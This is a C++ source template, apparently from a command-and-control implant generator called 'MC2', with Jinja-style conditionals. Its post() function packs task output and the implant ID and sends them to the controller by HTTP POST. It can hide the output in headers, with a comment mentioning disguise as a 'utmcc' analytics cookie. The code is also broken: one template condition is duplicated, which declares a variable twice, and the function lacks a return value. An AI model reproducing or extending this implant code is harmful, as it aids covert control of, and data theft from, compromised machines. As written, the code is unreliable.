int post(std::string implant_uuid, std::string output_data, std::string task_uuid) {
    std::vector<uint8_t> task_response_msgpack;

    //need to turn output data into msgpack
    create_task_response(implant_uuid, task_uuid, output_data, task_response_msgpack);

    //any transformations to data
    //hold bytes in string, as all the transforsm want a string
    std::string payload(task_response_msgpack.begin(), task_response_msgpack.end());
    
    //no if's, just let the python handle which options, etc, and paste in:
    
    //base64_encode_inplace(payload); //this should be metadata buffer
    //transforms

    ////add into header - wstring cuz that's what the winapi uses

    std::vector<std::wstring> headers;

    {# IF MC2 says it wants a header for storing the ID...#}
    [% if id_http_header %]
    headers.push_back(L"[[id_header]]: " + std::wstring(implant_uuid.begin(), implant_uuid.end()));
    [% endif %]

    {# IF MC2 says it wants a parameter for storing the ID...#}
    [% if id_http_parameter %]
    //?
    [% endif %]


    {# IF MC2 says it wants a header for storing the output...#}
    [% if output_http_header %]
    headers.push_back(L"[[output_header]]: " + std::wstring(payload.begin(), payload.end()));
    //this specific profile, no data in body. It's stored in utmcc
    std::string payload_string = "";
    [% endif %]
    
    {# IF MC2 says it wants to store the output in the body#}
    [% if output_http_header %]
    std::string payload_string = payload;
    [% endif %]

    //send
    std::vector<uint8_t> http_post_response_buffer;
    if (!HTTP_POST(payload_string, headers, http_post_response_buffer)) {
        std::cout << "Error occured posting data";
    };
    
    //return 0;


}